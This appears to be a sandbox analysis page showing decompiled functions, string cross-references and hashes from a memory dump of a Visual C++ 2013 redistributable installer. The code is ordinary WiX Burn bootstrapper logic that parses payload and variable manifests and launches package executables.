Failed to find catalog., xrefs: 0128517B
Failed to hex decode @CertificateRootPublicKeyIdentifier., xrefs: 01285151
Failed to get @DownloadUrl., xrefs: 01285135
Failed to get @Packaging., xrefs: 01285106

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: String$Compare$Variant$AllocClearFreeInit
String ID: Catalog$CertificateRootPublicKeyIdentifier$CertificateRootThumbprint$Container$DownloadUrl$Failed to allocate memory for payload structs.$Failed to find catalog.$Failed to get @Catalog.$Failed to get @CertificateRootPublicKeyIdentifier.$Failed to get @CertificateRootThumbprint.$Failed to get @Container.$Failed to get @DownloadUrl.$Failed to get @FilePath.$Failed to get @FileSize.$Failed to get @Hash.$Failed to get @Id.$Failed to get @LayoutOnly.$Failed to get @Packaging.$Failed to get @SourcePath.$Failed to get next node.$Failed to get payload node count.$Failed to hex decode @CertificateRootPublicKeyIdentifier.$Failed to hex decode @CertificateRootThumbprint.$Failed to hex decode the Payload/@Hash.$Failed to parse @FileSize.$Failed to select payload nodes.$Failed to to find container: %ls$FilePath$FileSize$Hash$Invalid value for @Packaging: %ls$LayoutOnly$Packaging$Payload$SourcePath$X$download$embedded$external$payload.cpp
API String ID: 937563602-2914604125
Opcode ID: 5c88e94106e89f0fa2ac226b907011f725b212bd275e7027539d2fa22afa4a7f
Instruction ID: 5fe864ddf36234c18c14e8b9b11f9b31469e2b77478a3f972b664b3307fc65c7
Opcode Fuzzy Hash: 5c88e94106e89f0fa2ac226b907011f725b212bd275e7027539d2fa22afa4a7f
Instruction Fuzzy Hash: BCC1C531D7261ABFCB21FA54CD81EEDBA74EF04B50F140265FA11B7180D7B5AE528B90

Uniqueness

Uniqueness Score: -1.00%

Function 0129A2B3 Relevance: 67.0, APIs: 11, Strings: 27, Instructions: 461
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0129A2B3(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				short _v528;
				WCHAR* _v532;
				WCHAR* _v536;
				char _v540;
				WCHAR* _v544;
				char _v548;
				char _v552;
				intOrPtr* _v556;
				char _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				int _v576;
				struct _PROCESS_INFORMATION _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v608;
				intOrPtr _v612;
				char _v616;
				struct _STARTUPINFOW _v684;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t148;
				signed int _t169;
				intOrPtr* _t171;
				signed int _t186;
				intOrPtr _t187;
				intOrPtr _t192;
				long _t194;
				int _t197;
				intOrPtr _t198;
				void* _t203;
				signed int _t212;
				intOrPtr _t216;
				signed int _t223;
				signed int _t224;
				signed int _t226;
				signed int _t240;
				struct _SECURITY_ATTRIBUTES* _t245;
				signed int _t266;
				intOrPtr _t271;
				void* _t272;
				signed int _t273;
				void* _t274;
				void* _t275;
				void* _t276;
				void* _t277;
				void* _t280;
				void* _t281;
				void* _t282;

				_t262 = __edx;
				_t148 =  *0x12d40d0; // 0xaab4e29e
				_v8 = _t148 ^ _t273;
				_v572 = _a8;
				_v596 = _a12;
				_t271 = _a4;
				_v564 = _a16;
				_v568 = _a20;
				_v600 = _a24;
				_t245 = 0;
				E012A7E30( &_v528, 0, 0x208);
				_v576 = 0;
				_v552 = 0;
				_v560 = 0;
				_v544 = 0;
				_v532 = 0;
				_v536 = 0;
				_v540 = 0;
				E012A7E30( &_v684, 0, 0x44);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t275 = _t274 + 0x18;
				asm("stosd");
				_t24 = _t271 + 8; // 0xb491
				_v548 = 0;
				if(E0129743F( &_v544,  &_v616,  *((intOrPtr*)( *_t24 + 0x14)),  *((intOrPtr*)( *_t24 + 0x24)),  &_v544) >= 0) {
					_t31 = _t271 + 8; // 0xb491
					_t266 = E012B201F( &_v544, _t262, _v544,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t31 + 0x7c)))) + 0x18)),  &_v532);
					__eflags = _t266;
					if(_t266 >= 0) {
						_t35 = _t271 + 0x10; // 0x68077dfe
						_t169 =  *_t35 - 1;
						__eflags = _t169;
						if(_t169 == 0) {
							_t40 = _t271 + 8; // 0xb491
							_t171 =  *((intOrPtr*)( *_t40 + 0x9c));
							L13:
							_v556 = _t171;
							__eflags = _t171 - _t245;
							if(_t171 == _t245) {
								L22:
								_t266 = E012B177A( &_v536, L"\"%ls\"", _v532);
								_t276 = _t275 + 0xc;
								__eflags = _t266 - _t245;
								if(_t266 < _t245) {
									L18:
									_push("Failed to create executable command.");
									L5:
									_push(_t266);
									E012AFA86();
									L73:
									if(_v552 != _t245) {
										E012B01E8(_v552);
									}
									if(_v560 != _t245) {
										E012B01E8(_v560);
									}
									if(_v544 != _t245) {
										E012B01E8(_v544);
									}
									if(_v532 != _t245) {
										E012B01E8(_v532);
									}
									if(_v536 != _t245) {
										E012B01E8(_v536);
									}
									if(_v540 != _t245) {
										E012B01E8(_v540);
									}
									_t272 = CloseHandle;
									if(_v592.hThread != _t245) {
										CloseHandle(_v592.hThread);
										_v592.hThread = _t245;
									}
									if(_v592.hProcess != _t245) {
										CloseHandle(_v592.hProcess);
									}
									return E012A7EAA(_t266, _t245, _v8 ^ _t273, _t262, _t266, _t272);
								}
								_t186 = E012B177A( &_v540, L"\"%ls\"", _v532);
								_t277 = _t276 + 0xc;
								L24:
								_t266 = _t186;
								__eflags = _t266 - _t245;
								if(_t266 >= _t245) {
									_t58 = _t271 + 8; // 0xb491
									_t187 =  *_t58;
									__eflags =  *((intOrPtr*)(_t187 + 0xb0)) - 1;
									if( *((intOrPtr*)(_t187 + 0xb0)) != 1) {
										L39:
										_push(_v540);
										_push(_v532);
										_t74 = _t271 + 0x10; // 0x68077dfe
										_push(E012917CA( *_t74));
										_t75 = _t271 + 8; // 0xb491
										_push( *((intOrPtr*)( *_t75)));
										E01281566(2, 0x2000012d, E01291B91(_v596));
										_t77 = _t271 + 0xc; // 0x3bf88b00
										_t192 =  *_t77;
										_t275 = _t277 + 0x1c;
										__eflags = _t192 - 1;
										if(_t192 != 1) {
											L43:
											__eflags = _t192 - 2;
											if(_t192 != 2) {
												L47:
												__eflags = _t192 - 1;
												if(_t192 != 1) {
													L51:
													_t194 = GetCurrentDirectoryW(0x104,  &_v528);
													__eflags = _t194;
													if(_t194 != 0) {
														_v576 = SetCurrentDirectoryW(_v544);
													}
													_v684.cb = 0x44;
													_t197 = CreateProcessW(_v532, _v536, _t245, _t245, _t245, 0x8000000, _t245, _t245,  &_v684,  &_v592);
													__eflags = _t197;
													if(_t197 != 0) {
														_t110 = _t271 + 0xc; // 0x3bf88b00
														_t198 =  *_t110;
														__eflags = _t198 - 3;
														if(_t198 == 3) {
															L70:
															WaitForInputIdle(_v592.hProcess, 0x1388);
															goto L71;
														}
														__eflags = _t198 - 2;
														if(_t198 == 2) {
															goto L70;
														} else {
															goto L61;
														}
														do {
															L61:
															_v616 = 2;
															_v612 = 1;
															_v608 = 0x32;
															_t203 = _v564( &_v616, _v568);
															__eflags = _t203 - 1;
															if(_t203 == 1) {
																goto L63;
															}
															__eflags = _t203 - _t245;
															if(_t203 != _t245) {
																__eflags = _t203 - 2;
																_t125 = (0 | _t203 != 0x00000002) - 0x7ff8f9be; // -2147023294
																_t266 = _t125;
																E012B294E(_t203, "exeengine.cpp", 0x273, _t266);
																_push("Bootstrapper application aborted during EXE progress.");
																_push(_t266);
																E012AFA86();
																goto L71;
															}
															L63:
															_t266 = E012B0034(1, _v592, 0x1f4,  &_v548);
															__eflags = _t266 - 0x80070102;
														} while (_t266 == 0x80070102);
														__eflags = _t266 - _t245;
														if(_t266 < _t245) {
															_push(_v532);
															_push("Failed to wait for executable to complete: %ls");
															goto L67;
														}
														L65:
														_t121 = _t271 + 8; // 0xb491
														_t266 = E01299D85( *_t121, _v548, _v600);
														__eflags = _t266 - _t245;
														if(_t266 >= _t245) {
															goto L71;
														}
														E012B294E(_t208, "exeengine.cpp", 0x27e, _t266);
														_push(_v548);
														_push("Process returned error: 0x%x");
														goto L67;
													} else {
														_t212 = GetLastError();
														__eflags = _t212 - _t245;
														if(_t212 > _t245) {
															_t212 = _t212 & 0x0000ffff | 0x80070000;
															__eflags = _t212;
														}
														_t266 = _t212;
														__eflags = _t266 - _t245;
														if(_t266 >= _t245) {
															_t266 = 0x80004005;
														}
														E012B294E(_t212, "exeengine.cpp", 0x263, _t266);
														_push(_v532);
														_push("Failed to CreateProcess on path: %ls");
														L67:
														_push(_t266);
														E012AFA86();
														L71:
														__eflags = _v576 - _t245;
														if(_v576 != _t245) {
															SetCurrentDirectoryW( &_v528);
														}
														goto L73;
													}
												}
												_t93 = _t271 + 8; // 0xb491
												_t216 =  *_t93;
												__eflags =  *((intOrPtr*)(_t216 + 0xb0)) - 2;
												if( *((intOrPtr*)(_t216 + 0xb0)) != 2) {
													goto L51;
												}
												_t266 = E012A4D0B(_t262, _v532, _v536, _v564, _v568,  &_v548);
												__eflags = _t266 - _t245;
												if(_t266 >= _t245) {
													goto L65;
												}
												_push(_v532);
												_push("Failed to run netfx chainer: %ls");
												L2:
												_push(_t266);
												E012AFA86();
												goto L73;
											}
											_t86 = _t271 + 8; // 0xb491
											_t262 =  *_t86;
											__eflags =  *((intOrPtr*)( *_t86 + 0xb0)) - 1;
											if(__eflags != 0) {
												goto L47;
											}
											_t266 = E012A54BB(_t262, __eflags, _v532, _v536, _v564, _v568);
											__eflags = _t266 - _t245;
											if(_t266 >= _t245) {
												goto L73;
											}
											_push(_v532);
											_push("Failed to run bundle asynchronously from path: %ls");
											goto L2;
										}
										_t78 = _t271 + 8; // 0xb491
										_t262 =  *_t78;
										__eflags =  *((intOrPtr*)( *_t78 + 0xb0)) - 1;
										if(__eflags != 0) {
											goto L43;
										}
										_t266 = E012A5487(_t262, __eflags, _v532, _v536, _v564, _v568,  &_v548);
										__eflags = _t266 - _t245;
										if(_t266 >= _t245) {
											goto L65;
										}
										_push(_v532);
										_push("Failed to run bundle as embedded from path: %ls");
										goto L2;
									}
									_t60 = _t271 + 0x14; // 0x12ccbf4
									_t223 =  *_t60;
									_t246 = L"%ls -%ls=%ls";
									__eflags = _t223;
									if(_t223 == 0) {
										L33:
										_t66 = _t271 + 0x18; // 0x458d1ceb
										_t224 =  *_t66;
										__eflags = _t224;
										if(_t224 == 0) {
											L38:
											_t245 = 0;
											__eflags = 0;
											goto L39;
										}
										_push(_t224);
										_push(L"burn.ancestors");
										_t226 = E012B177A( &_v536, _t246, _v536);
										_t280 = _t277 + 0x14;
										__eflags = _t226;
										if(_t226 >= 0) {
											_t69 = _t271 + 0x18; // 0x458d1ceb
											_push( *_t69);
											_push(L"burn.ancestors");
											_t266 = E012B177A( &_v540, _t246, _v540);
											_t277 = _t280 + 0x14;
											__eflags = _t266;
											if(_t266 >= 0) {
												goto L38;
											}
											_push("Failed to append the list of ancestors to the obfuscated command line.");
											L30:
											_push(_t266);
											E012AFA86();
											_t245 = 0;
											goto L73;
										}
										_push("Failed to append the list of ancestors to the command line.");
										goto L30;
									}
									_push(_t223);
									_push(L"burn.ignoredependencies");
									_t266 = E012B177A( &_v536, L"%ls -%ls=%ls", _v536);
									_t281 = _t277 + 0x14;
									__eflags = _t266;
									if(_t266 >= 0) {
										_t63 = _t271 + 0x14; // 0x12ccbf4
										_push( *_t63);
										_push(L"burn.ignoredependencies");
										_t266 = E012B177A( &_v540, L"%ls -%ls=%ls", _v540);
										_t277 = _t281 + 0x14;
										__eflags = _t266;
										if(_t266 >= 0) {
											goto L33;
										}
										_push("Failed to append the list of dependencies to ignore to the obfuscated command line.");
										goto L30;
									}
									_push("Failed to append the list of dependencies to ignore to the command line.");
									goto L30;
								}
								_push("Failed to create obfuscated executable command.");
								goto L5;
							}
							__eflags =  *_t171 - _t245;
							if( *_t171 == _t245) {
								goto L22;
							}
							_t266 = E01288C14(_v572, _t171,  &_v552, _t245);
							__eflags = _t266 - _t245;
							if(_t266 >= _t245) {
								_push(_v552);
								_t266 = E012B177A( &_v536, L"\"%ls\" %s", _v532);
								_t282 = _t275 + 0x10;
								__eflags = _t266 - _t245;
								if(_t266 >= _t245) {
									_t266 = E0128B5C7(_v572, _v556,  &_v560, _t245);
									__eflags = _t266 - _t245;
									if(_t266 >= _t245) {
										_push(_v560);
										_t186 = E012B177A( &_v540, L"\"%ls\" %s", _v532);
										_t277 = _t282 + 0x10;
										goto L24;
									}
									_push("Failed to format obfuscated argument string.");
									goto L5;
								}
								goto L18;
							}
							_push("Failed to format argument string.");
							goto L5;
						}
						_t240 = _t169 - 1;
						__eflags = _t240;
						if(_t240 == 0) {
							_t38 = _t271 + 8; // 0xb491
							_t171 =  *((intOrPtr*)( *_t38 + 0x94));
							goto L13;
						}
						__eflags = _t240 == 3;
						if(_t240 == 3) {
							_t36 = _t271 + 8; // 0xb491
							_t171 =  *((intOrPtr*)( *_t36 + 0x98));
							goto L13;
						}
						_t266 = 0x8000ffff;
						_push("Failed to get action arguments for executable package.");
						goto L5;
					}
					_push("Failed to build executable path.");
					goto L5;
				}
				_t29 = _t271 + 8; // 0xb491
				_push( *((intOrPtr*)( *_t29)));
				_push("Failed to get cached path for package: %ls");
				goto L2;
			}

0x0129a2b3
0x0129a2bc
0x0129a2c3
0x0129a2c9
0x0129a2d2
0x0129a2dd
0x0129a2e0
0x0129a2ea
0x0129a2f8
0x0129a2fe
0x0129a308
0x0129a317
0x0129a31d
0x0129a323
0x0129a329
0x0129a32f
0x0129a335
0x0129a33b
0x0129a341
0x0129a34e
0x0129a34f
0x0129a350
0x0129a351
0x0129a35a
0x0129a35b
0x0129a35c
0x0129a35d
0x0129a360
0x0129a361
0x0129a36b
0x0129a380
0x0129a3a1
0x0129a3b7
0x0129a3b9
0x0129a3bb
0x0129a3cf
0x0129a3d2
0x0129a3d2
0x0129a3d3
0x0129a3ff
0x0129a402
0x0129a408
0x0129a408
0x0129a40e
0x0129a410
0x0129a4bb
0x0129a4d2
0x0129a4d4
0x0129a4d7
0x0129a4d9
0x0129a466
0x0129a466
0x0129a3c2
0x0129a3c2
0x0129a3c3
0x0129a8b0
0x0129a8b6
0x0129a8be
0x0129a8be
0x0129a8c9
0x0129a8d1
0x0129a8d1
0x0129a8dc
0x0129a8e4
0x0129a8e4
0x0129a8ef
0x0129a8f7
0x0129a8f7
0x0129a902
0x0129a90a
0x0129a90a
0x0129a915
0x0129a91d
0x0129a91d
0x0129a922
0x0129a92e
0x0129a936
0x0129a938
0x0129a938
0x0129a944
0x0129a94c
0x0129a94c
0x0129a95e
0x0129a95e
0x0129a4ed
0x0129a4f2
0x0129a4f5
0x0129a4f5
0x0129a4f7
0x0129a4f9
0x0129a505
0x0129a505
0x0129a508
0x0129a50f
0x0129a5e2
0x0129a5e2
0x0129a5e8
0x0129a5ee
0x0129a5f6
0x0129a5f7
0x0129a5fa
0x0129a60f
0x0129a614
0x0129a614
0x0129a61a
0x0129a61d
0x0129a61f
0x0129a66a
0x0129a66a
0x0129a66d
0x0129a6b1
0x0129a6b1
0x0129a6b3
0x0129a6ff
0x0129a70b
0x0129a711
0x0129a713
0x0129a721
0x0129a721
0x0129a745
0x0129a755
0x0129a75b
0x0129a75d
0x0129a79e
0x0129a79e
0x0129a7a1
0x0129a7a4
0x0129a88a
0x0129a895
0x00000000
0x0129a895
0x0129a7aa
0x0129a7ad
0x00000000
0x00000000
0x00000000
0x00000000
0x0129a7b3
0x0129a7b3
0x0129a7c3
0x0129a7cd
0x0129a7d3
0x0129a7dd
0x0129a7e3
0x0129a7e5
0x00000000
0x00000000
0x0129a7e7
0x0129a7e9
0x0129a852
0x0129a858
0x0129a858
0x0129a869
0x0129a86e
0x0129a873
0x0129a874
0x00000000
0x0129a87a
0x0129a7eb
0x0129a802
0x0129a804
0x0129a804
0x0129a80c
0x0129a80e
0x0129a87d
0x0129a883
0x00000000
0x0129a883
0x0129a810
0x0129a81c
0x0129a824
0x0129a826
0x0129a828
0x00000000
0x00000000
0x0129a835
0x0129a83a
0x0129a840
0x00000000
0x0129a75f
0x0129a75f
0x0129a765
0x0129a767
0x0129a76e
0x0129a76e
0x0129a76e
0x0129a773
0x0129a775
0x0129a777
0x0129a779
0x0129a779
0x0129a789
0x0129a78e
0x0129a794
0x0129a845
0x0129a845
0x0129a846
0x0129a89b
0x0129a89b
0x0129a8a1
0x0129a8aa
0x0129a8aa
0x00000000
0x0129a8a1
0x0129a75d
0x0129a6b5
0x0129a6b5
0x0129a6b8
0x0129a6bf
0x00000000
0x00000000
0x0129a6e5
0x0129a6e7
0x0129a6e9
0x00000000
0x00000000
0x0129a6ef
0x0129a6f5
0x0129a38c
0x0129a38c
0x0129a38d
0x00000000
0x0129a392
0x0129a66f
0x0129a66f
0x0129a672
0x0129a678
0x00000000
0x00000000
0x0129a697
0x0129a699
0x0129a69b
0x00000000
0x00000000
0x0129a6a1
0x0129a6a7
0x00000000
0x0129a6a7
0x0129a621
0x0129a621
0x0129a624
0x0129a62a
0x00000000
0x00000000
0x0129a650
0x0129a652
0x0129a654
0x00000000
0x00000000
0x0129a65a
0x0129a660
0x00000000
0x0129a660
0x0129a515
0x0129a515
0x0129a518
0x0129a51d
0x0129a51f
0x0129a582
0x0129a582
0x0129a582
0x0129a585
0x0129a587
0x0129a5e0
0x0129a5e0
0x0129a5e0
0x00000000
0x0129a5e0
0x0129a589
0x0129a58a
0x0129a59d
0x0129a5a4
0x0129a5a7
0x0129a5a9
0x0129a5b2
0x0129a5b2
0x0129a5bb
0x0129a5cd
0x0129a5cf
0x0129a5d2
0x0129a5d4
0x00000000
0x00000000
0x0129a5d6
0x0129a548
0x0129a548
0x0129a549
0x0129a550
0x00000000
0x0129a550
0x0129a5ab
0x00000000
0x0129a5ab
0x0129a521
0x0129a522
0x0129a53a
0x0129a53c
0x0129a53f
0x0129a541
0x0129a557
0x0129a557
0x0129a560
0x0129a572
0x0129a574
0x0129a577
0x0129a579
0x00000000
0x00000000
0x0129a57b
0x00000000
0x0129a57b
0x0129a543
0x00000000
0x0129a543
0x0129a4fb
0x00000000
0x0129a4fb
0x0129a416
0x0129a419
0x00000000
0x00000000
0x0129a433
0x0129a435
0x0129a437
0x0129a440
0x0129a45d
0x0129a45f
0x0129a462
0x0129a464
0x0129a489
0x0129a48b
0x0129a48d
0x0129a499
0x0129a4b1
0x0129a4b6
0x00000000
0x0129a4b6
0x0129a48f
0x00000000
0x0129a48f
0x00000000
0x0129a464
0x0129a439
0x00000000
0x0129a439
0x0129a3d5
0x0129a3d5
0x0129a3d6
0x0129a3f4
0x0129a3f7
0x00000000
0x0129a3f7
0x0129a3d8
0x0129a3db
0x0129a3e9
0x0129a3ec
0x00000000
0x0129a3ec
0x0129a3dd
0x0129a3e2
0x00000000
0x0129a3e2
0x0129a3bd
0x00000000
0x0129a3bd
0x0129a382
0x0129a385
0x0129a387
0x00000000

APIs

_memset.LIBCMT ref: 0129A308
_memset.LIBCMT ref: 0129A341
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,?,012A37C3), ref: 0129A936
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,?,012A37C3), ref: 0129A94C

Strings

burn.ancestors, xrefs: 0129A58A, 0129A5BB
Failed to wait for executable to complete: %ls, xrefs: 0129A883
Failed to create obfuscated executable command., xrefs: 0129A4FB
exeengine.cpp, xrefs: 0129A784, 0129A830, 0129A864
Failed to append the list of dependencies to ignore to the obfuscated command line., xrefs: 0129A57B
Failed to format argument string., xrefs: 0129A439
Failed to format obfuscated argument string., xrefs: 0129A48F
Failed to get action arguments for executable package., xrefs: 0129A3E2
Failed to get bundle element., xrefs: 0129A521
"%ls", xrefs: 0129A4C7, 0129A4E7
2, xrefs: 0129A7D3
Failed to CreateProcess on path: %ls, xrefs: 0129A794
Failed to append the list of ancestors to the command line., xrefs: 0129A5AB
"%ls" %s, xrefs: 0129A452, 0129A4AB
D, xrefs: 0129A745
Bootstrapper application aborted during EXE progress., xrefs: 0129A86E
Failed to append the list of dependencies to ignore to the command line., xrefs: 0129A543
%ls -%ls=%ls, xrefs: 0129A518, 0129A533, 0129A56B, 0129A59B, 0129A5C6
Failed to append the list of ancestors to the obfuscated command line., xrefs: 0129A5D6
Failed to create executable command., xrefs: 0129A466
Failed to build executable path., xrefs: 0129A3BD
Failed to get cached path for package: %ls, xrefs: 0129A387
burn.ignoredependencies, xrefs: 0129A522, 0129A560
Failed to run bundle as embedded from path: %ls, xrefs: 0129A660
Failed to run netfx chainer: %ls, xrefs: 0129A6F5
Process returned error: 0x%x, xrefs: 0129A840
Failed to run bundle asynchronously from path: %ls, xrefs: 0129A6A7

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseHandle_memset
String ID: "%ls"$"%ls" %s$%ls -%ls=%ls$2$Bootstrapper application aborted during EXE progress.$D$Failed to CreateProcess on path: %ls$Failed to append the list of ancestors to the command line.$Failed to append the list of ancestors to the obfuscated command line.$Failed to append the list of dependencies to ignore to the command line.$Failed to append the list of dependencies to ignore to the obfuscated command line.$Failed to build executable path.$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$Failed to get action arguments for executable package.$Failed to get bundle element.$Failed to get cached path for package: %ls$Failed to run bundle as embedded from path: %ls$Failed to run bundle asynchronously from path: %ls$Failed to run netfx chainer: %ls$Failed to wait for executable to complete: %ls$Process returned error: 0x%x$burn.ancestors$burn.ignoredependencies$exeengine.cpp
API String ID: 900656945-2335447641
Opcode ID: df6d3450c519962e6d209385094630d2f0dbd580474a0b0f4f536bb48b519c6c
Instruction ID: 8d7a1620c45f19d576cb46043bc04e74f4b41361c056e9e56f718bd7cc4e5b8b
Opcode Fuzzy Hash: df6d3450c519962e6d209385094630d2f0dbd580474a0b0f4f536bb48b519c6c
Instruction Fuzzy Hash: 1702BE7196031AAFDF21AF68DC89AEDB7B6FB58740F1041E9E209A7120D7719EC18F11

Uniqueness

Uniqueness Score: -1.00%

Function 0128A0C3 Relevance: 58.1, APIs: 5, Strings: 28, Instructions: 307
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E0128A0C3(struct _CRITICAL_SECTION* _a4, int _a8) {
				char _v8;
				void* _v12;
				int _v16;
				char _v20;
				int _v24;
				void* _v28;
				char _v32;
				char _v36;
				char _v52;
				intOrPtr* _t95;
				intOrPtr* _t97;
				intOrPtr* _t98;
				signed int _t122;
				signed int _t126;
				intOrPtr* _t130;
				struct _CRITICAL_SECTION* _t151;
				signed int _t158;
				void* _t159;
				int _t162;
				void* _t164;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v28 = 0;
				_v12 = 0;
				_v32 = 0;
				_v8 = 0;
				_v16 = 0;
				asm("stosd");
				_v20 = 0;
				_v36 = 0;
				_v24 = 0;
				EnterCriticalSection(_a4);
				if(E012B4F9E(_a8, L"Variable",  &_v28) >= 0) {
					_t95 = _v28;
					_t146 =  *_t95;
					_t152 =  &_v32;
					_t158 =  *((intOrPtr*)( *_t95 + 0x20))(_t95,  &_v32);
					if(_t158 >= 0) {
						_a8 = 0;
						if(_v32 > 0) {
							while(1) {
								_t158 = E012B5026(_t146, _v28,  &_v12, 0);
								if(_t158 < 0) {
									break;
								}
								_t158 = E012B540B(_v12, L"Id",  &_v8);
								if(_t158 < 0) {
									_push("Failed to get @Id.");
									goto L51;
								} else {
									_t158 = E012B54DD(_t146, _v12, L"Hidden",  &_v20);
									if(_t158 < 0) {
										_push("Failed to get @Hidden.");
										goto L51;
									} else {
										_t158 = E012B54DD(_t146, _v12, L"Persisted",  &_v36);
										if(_t158 < 0) {
											_push("Failed to get @Persisted.");
											goto L51;
										} else {
											_t158 = E012B540B(_v12, L"Value",  &_v16);
											if(_t158 == 0x80070490) {
												_t159 = 0;
												goto L28;
											} else {
												if(_t158 < 0) {
													_push("Failed to get @Value.");
													goto L51;
												} else {
													_t158 = E012A0FFE(_t146, _t152,  &_v52, _v16, 0);
													if(_t158 < 0) {
														_push("Failed to set variant value.");
														goto L51;
													} else {
														_t158 = E012B540B(_v12, L"Type",  &_v16);
														if(_t158 < 0) {
															_push("Failed to get @Type.");
															goto L51;
														} else {
															_t162 = _t158 | 0xffffffff;
															if(CompareStringW(0x7f, 0, _v16, _t162, L"numeric", _t162) != 2) {
																if(CompareStringW(0x7f, 0, _v16, _t162, L"string", _t162) != 2) {
																	if(CompareStringW(0x7f, 0, _v16, _t162, L"version", _t162) != 2) {
																		_push(_v16);
																		_t158 = 0x80070057;
																		_push("Invalid value for @Type: %ls");
																		goto L55;
																	} else {
																		if(_v20 == 0) {
																			_push(_v52);
																			E012AF6A2(_t141, "Initializing version variable \'%ls\' to value \'%ls\'", _v8);
																			_t164 = _t164 + 0x10;
																		}
																		_push(3);
																		goto L26;
																	}
																} else {
																	if(_v20 == 0) {
																		_push(_v52);
																		E012AF6A2(_t140, "Initializing string variable \'%ls\' to value \'%ls\'", _v8);
																		_t164 = _t164 + 0x10;
																	}
																	_push(2);
																	L26:
																	_pop(_t159);
																	goto L28;
																}
															} else {
																if(_v20 == 0) {
																	_push(_v52);
																	E012AF6A2(_t139, "Initializing numeric variable \'%ls\' to value \'%ls\'", _v8);
																	_t164 = _t164 + 0x10;
																}
																_t159 = 1;
																L28:
																if(_v20 != 0) {
																	E012AF6A2(2, "Initializing hidden variable \'%ls\'", _v8);
																	_t164 = _t164 + 0xc;
																}
																_t158 = E012A10FF( &_v52, _t159);
																if(_t158 < 0) {
																	_push("Failed to change variant type.");
																	goto L51;
																} else {
																	_t158 = E01288E63(_t146, _a4, _v8,  &_v24);
																	if(_t158 < 0) {
																		_push(_v8);
																		_push("Failed to find variable value \'%ls\'.");
																		goto L55;
																	} else {
																		_t122 = _v24;
																		_t151 = _a4;
																		if(_t158 != 1) {
																			_t123 = _t122 * 0x30;
																			if( *((intOrPtr*)(_t122 * 0x30 +  *((intOrPtr*)(_t151 + 0x20)) + 0x20)) != 0) {
																				_t158 = 0x80070057;
																				E012B294E(_t123, "variable.cpp", 0x18e, 0x80070057);
																				_push(_v8);
																				_push("Attempt to set built-in variable value: %ls");
																				goto L55;
																			} else {
																				goto L36;
																			}
																		} else {
																			_t158 = E01289C0E(_t122, _t151, _v8);
																			if(_t158 < 0) {
																				_push(_v8);
																				_push("Failed to insert variable \'%ls\'.");
																				goto L55;
																			} else {
																				_t151 = _a4;
																				L36:
																				_t126 = _v24 * 0x30;
																				 *((intOrPtr*)(_t126 +  *((intOrPtr*)(_t151 + 0x20)) + 0x18)) = _v20;
																				_t152 =  *((intOrPtr*)(_t151 + 0x20));
																				 *((intOrPtr*)(_t126 +  *((intOrPtr*)(_t151 + 0x20)) + 0x1c)) = _v36;
																				_t146 =  *((intOrPtr*)(_t151 + 0x20));
																				_t158 = E012A1091( *((intOrPtr*)(_t151 + 0x20)),  &_v52, _t126 +  *((intOrPtr*)(_t151 + 0x20)) + 8);
																				if(_t158 < 0) {
																					_push(_v8);
																					_push("Failed to set value of variable: %ls");
																					L55:
																					_push(_t158);
																					E012AFA86();
																				} else {
																					_t130 = _v12;
																					if(_t130 != 0) {
																						_t146 =  *_t130;
																						 *((intOrPtr*)( *_t130 + 8))(_t130);
																						_v12 = 0;
																					}
																					_a8 = _a8 + 1;
																					if(_a8 < _v32) {
																						continue;
																					} else {
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
								goto L56;
							}
							_push("Failed to get next node.");
							goto L51;
						}
					} else {
						_push("Failed to get variable node count.");
						goto L51;
					}
				} else {
					_push("Failed to select variable nodes.");
					L51:
					_push(_t158);
					E012AFA86();
				}
				L56:
				LeaveCriticalSection(_a4);
				_t97 = _v28;
				if(_t97 != 0) {
					 *((intOrPtr*)( *_t97 + 8))(_t97);
				}
				_t98 = _v12;
				if(_t98 != 0) {
					 *((intOrPtr*)( *_t98 + 8))(_t98);
				}
				if(_v16 != 0) {
					E012B01E8(_v16);
				}
				if(_v8 != 0) {
					E012B01E8(_v8);
				}
				E012A0E72( &_v52);
				return _t158;
			}

0x0128a0d4
0x0128a0d5
0x0128a0d8
0x0128a0d9
0x0128a0dc
0x0128a0df
0x0128a0e2
0x0128a0e5
0x0128a0e8
0x0128a0e9
0x0128a0ec
0x0128a0ef
0x0128a0f2
0x0128a10d
0x0128a119
0x0128a11c
0x0128a11e
0x0128a126
0x0128a12a
